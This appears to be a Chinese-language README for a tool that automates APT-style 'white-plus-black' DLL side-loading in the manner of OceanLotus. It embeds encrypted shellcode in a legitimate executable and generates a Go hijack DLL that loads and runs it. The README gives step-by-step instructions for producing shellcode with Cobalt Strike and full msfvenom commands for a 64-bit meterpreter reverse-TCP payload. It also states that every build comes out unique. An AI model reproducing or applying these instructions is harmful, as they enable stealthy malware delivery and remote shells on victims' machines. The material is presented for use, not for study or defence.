模仿APT组织白加黑的攻击方式,如海莲花样本追踪与分析（二）海莲花APT分析-白加黑 本工具可以根据白加黑样本模板自动生成白加黑的工具，dll由go在线编译

shellcode会被写入到白可执行文件中，dll会从白文件中读取shellcode解密并执行。

输入shellcode，选择好白加黑的模板(注意对应架构)，32位选择x86，64位选择x64。每次生成都会生成一个独一无二的文件。

生成的文件会包含:

• 成品的白加黑文件
• 用于dll劫持的go源码文件，方便自行进行一些处理
• readme说明文件，说明了每个文件的作用以及编译方法

cobaltstrike 生成shellcode

生成后门 - Payload Generator

生成C语言格式

保存文件后复制生成的payload.c中所有的内容

点击生成即可。

msfvenom 生成shellcode

生成64位的payload c语言文件

msfvenom -p windows/x64/meterpreter/reverse_tcp -f c -o payload.c LHOST=x.x.x.x LPORT=7900

或者直接生成hex格式(推荐)

msfvenom -p windows/x64/meterpreter/reverse_tcp -f hex -o payload.c LHOST=x.x.x.x LPORT=7900

复制payload.c文件到shellcode文本框即可